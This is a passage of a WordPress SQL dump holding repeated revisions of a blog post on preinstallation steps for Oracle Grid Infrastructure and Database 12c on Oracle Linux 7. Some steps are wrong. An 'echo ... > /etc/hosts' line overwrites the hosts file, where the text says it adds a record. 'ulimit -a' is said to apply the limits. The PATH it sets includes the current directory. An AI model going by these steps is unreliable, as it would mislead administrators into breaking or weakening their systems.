PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES</li>\n<li>SHMMNI = PAGE_SIZE</li>\n</ul>\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>\nto determine RAM size in bytes, you can use free command:<br><code>\nfree -b\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you will edit /etc/sysctl.conf file and add these lines:<br>\n<code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <b>SHMMAX </b>\nkernel.shmall = <b>SHMALL </b>\nkernel.shmmni = <b>SHMMNI </b>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and use this command to apply these changes:<br>\n<code>\nsysctl -p\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should add users and groups in OS:<br>\n<code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if oracle or grid users exist, we can use these command instead of useradd:<br><code>usermod -g oinstall -G dba,oper,asmdba,asmoper oracle usermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to change password of these users:<br><code>passwd oracle</code><br><code>passwd grid </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should make directories for database and grid app and set permissions:<br>\n<code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:<br>\n<code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code><br>\nthen, you have to install an rpm file:<br>\n<code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:<br>\n<code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to apply these changes, you have to use this command:<br>\n<code>\nulimit -a \n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>the next step is oracleasm configuration:<br>\n<code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <b>grid</b>\nDefault group to own the driver interface [asmadmin]: <b>asmadmin</b>\nStart Oracle ASM library driver on boot (y/n) [y]: <b>y</b>\nScan for Oracle ASM disks on boot (y/n) [y]: <b>y</b>\nWriting Oracle ASM library driver configuration: done\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>now, you have to start oracleasm service and make it available on startup:<br>\n<code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:<br>\n<code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you run these commands:<br>\n<code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and you have to config .bash_profile file of grid user:<br>\n<code>\nvi /home/grid/.bash_profile\n</code><br>\nand insert these records in it:<br>\n<code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>finally, you should go to grid software location and start oracle universal installer:<br>\n<code>\ncd /u01/crs/grid\n./gridSetup.sh\n</code></p>\n<!-- /wp:paragraph -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:35:20','2020-02-02 09:35:20','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(35,2,'2020-02-02 09:36:33','2020-02-02 09:36:33','<!-- wp:paragraph -->\n<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all, you have to install required packages in the OS:<br> </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>yum install -y cloog-ppl libXxf86misc<br> yum install -y compat-libcap1 libXxf86vm<br> yum install -y compat-libstdc++-33 libaio-devel<br> yum install -y cpp libdmx<br> yum install -y gcc libstdc++-devel<br> yum install -y gcc-c++ mpfr<br> yum install -y glibc-devel make<br> yum install -y glibc-headers ppl<br> yum install -y kernel-headers xorg-x11-utils<br> yum install -y libXmu xorg-x11-xauth<br> yum install -y libXt libXv<br> yum install -y ksh libXxf86dga<br> yum install -y elfutils-libelf-devel<br> yum install -y sysstat<br> yum install -y smartmontools<br> yum install -y nfs-utils<br> yum install -y unzip<br> yum install -y net-tools<br> yum install kmod-oracleasm -y<br> yum install oracleasm-support -y</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:<br><code>echo \"IP hostname hostname.domain\" > /etc/hosts </code><br> you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you should calculate 3 parameters like this:<br>\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES</li>\n<li>SHMMNI = PAGE_SIZE</li>\n</ul>\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>\nto determine RAM size in bytes, you can use free command:<br><code>\nfree -b\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you will edit /etc/sysctl.conf file and add these lines:<br>\n<code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <b>SHMMAX </b>\nkernel.shmall = <b>SHMALL </b>\nkernel.shmmni = <b>SHMMNI </b>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and use this command to apply these changes:<br>\n<code>\nsysctl -p\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should add users and groups in OS:<br>\n<code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if oracle or grid users exist, we can use these command instead of useradd:<br><code>usermod -g oinstall -G dba,oper,asmdba,asmoper oracle usermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to change password of these users:<br><code>passwd oracle</code><br><code>passwd grid </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should make directories for database and grid app and set permissions:<br>\n<code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:<br>\n<code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code><br>\nthen, you have to install an rpm file:<br>\n<code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:<br>\n<code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to apply these changes, you have to use this command:<br>\n<code>\nulimit -a \n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>the next step is oracleasm configuration:<br>\n<code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <b>grid</b>\nDefault group to own the driver interface [asmadmin]: <b>asmadmin</b>\nStart Oracle ASM library driver on boot (y/n) [y]: <b>y</b>\nScan for Oracle ASM disks on boot (y/n) [y]: <b>y</b>\nWriting Oracle ASM library driver configuration: done\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>now, you have to start oracleasm service and make it available on startup:<br>\n<code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:<br>\n<code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you run these commands:<br>\n<code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and you have to config .bash_profile file of grid user:<br>\n<code>\nvi /home/grid/.bash_profile\n</code><br>\nand insert these records in it:<br>\n<code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>finally, you should go to grid software location and start oracle universal installer:<br>\n<code>\ncd /u01/crs/grid\n./gridSetup.sh\n</code></p>\n<!-- /wp:paragraph -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:36:33','2020-02-02 09:36:33','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(36,2,'2020-02-02 09:39:44','2020-02-02 09:39:44','<!-- wp:paragraph -->\n<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all, you have to install required packages in the OS:<br> </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<code><p>yum install -y cloog-ppl libXxf86misc<br> yum install -y compat-libcap1 libXxf86vm<br> yum install -y compat-libstdc++-33 libaio-devel<br> yum install -y cpp libdmx<br> yum install -y gcc libstdc++-devel<br> yum install -y gcc-c++ mpfr<br> yum install -y glibc-devel make<br> yum install -y glibc-headers ppl<br> yum install -y kernel-headers xorg-x11-utils<br> yum install -y libXmu xorg-x11-xauth<br> yum install -y libXt libXv<br> yum install -y ksh libXxf86dga<br> yum install -y elfutils-libelf-devel<br> yum install -y sysstat<br> yum install -y smartmontools<br> yum install -y nfs-utils<br> yum install -y unzip<br> yum install -y net-tools<br> yum install kmod-oracleasm -y<br> yum install oracleasm-support -y</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:<br><code>echo \"IP hostname hostname.domain\" > /etc/hosts </code><br> you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you should calculate 3 parameters like this:<br>\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES</li>\n<li>SHMMNI = PAGE_SIZE</li>\n</ul>\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>\nto determine RAM size in bytes, you can use free command:<br><code>\nfree -b\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you will edit /etc/sysctl.conf file and add these lines:<br>\n<code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <b>SHMMAX </b>\nkernel.shmall = <b>SHMALL </b>\nkernel.shmmni = <b>SHMMNI </b>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and use this command to apply these changes:<br>\n<code>\nsysctl -p\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should add users and groups in OS:<br>\n<code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if oracle or grid users exist, we can use these command instead of useradd:<br><code>usermod -g oinstall -G dba,oper,asmdba,asmoper oracle usermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to change password of these users:<br><code>passwd oracle</code><br><code>passwd grid </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should make directories for database and grid app and set permissions:<br>\n<code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:<br>\n<code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code><br>\nthen, you have to install an rpm file:<br>\n<code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:<br>\n<code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to apply these changes, you have to use this command:<br>\n<code>\nulimit -a \n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>the next step is oracleasm configuration:<br>\n<code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <b>grid</b>\nDefault group to own the driver interface [asmadmin]: <b>asmadmin</b>\nStart Oracle ASM library driver on boot (y/n) [y]: <b>y</b>\nScan for Oracle ASM disks on boot (y/n) [y]: <b>y</b>\nWriting Oracle ASM library driver configuration: done\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>now, you have to start oracleasm service and make it available on startup:<br>\n<code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:<br>\n<code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you run these commands:<br>\n<code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and you have to config .bash_profile file of grid user:<br>\n<code>\nvi /home/grid/.bash_profile\n</code><br>\nand insert these records in it:<br>\n<code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>finally, you should go to grid software location and start oracle universal installer:<br>\n<code>\ncd /u01/crs/grid\n./gridSetup.sh\n</code></p>\n<!-- /wp:paragraph -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:39:44','2020-02-02 09:39:44','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(37,2,'2020-02-02 09:40:28','2020-02-02 09:40:28','<!-- wp:paragraph -->\n<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all, you have to install required packages in the OS:<br> </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<code><p>yum install -y cloog-ppl libXxf86misc<br> yum install -y compat-libcap1 libXxf86vm<br> yum install -y compat-libstdc++-33 libaio-devel<br> yum install -y cpp libdmx<br> yum install -y gcc libstdc++-devel<br> yum install -y gcc-c++ mpfr<br> yum install -y glibc-devel make<br> yum install -y glibc-headers ppl<br> yum install -y kernel-headers xorg-x11-utils<br> yum install -y libXmu xorg-x11-xauth<br> yum install -y libXt libXv<br> yum install -y ksh libXxf86dga<br> yum install -y elfutils-libelf-devel<br> yum install -y sysstat<br> yum install -y smartmontools<br> yum install -y nfs-utils<br> yum install -y unzip<br> yum install -y net-tools<br> yum install kmod-oracleasm -y<br> yum install oracleasm-support -y</p></code>\n<!-- /wp:html -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:<br><code>echo \"IP hostname hostname.domain\" > /etc/hosts </code><br> you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you should calculate 3 parameters like this:<br>\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES</li>\n<li>SHMMNI = PAGE_SIZE</li>\n</ul>\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>\nto determine RAM size in bytes, you can use free command:<br><code>\nfree -b\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you will edit /etc/sysctl.conf file and add these lines:<br>\n<code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <b>SHMMAX </b>\nkernel.shmall = <b>SHMALL </b>\nkernel.shmmni = <b>SHMMNI </b>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and use this command to apply these changes:<br>\n<code>\nsysctl -p\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should add users and groups in OS:<br>\n<code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if oracle or grid users exist, we can use these command instead of useradd:<br><code>usermod -g oinstall -G dba,oper,asmdba,asmoper oracle usermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to change password of these users:<br><code>passwd oracle</code><br><code>passwd grid </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should make directories for database and grid app and set permissions:<br>\n<code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:<br>\n<code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code><br>\nthen, you have to install an rpm file:<br>\n<code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:<br>\n<code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 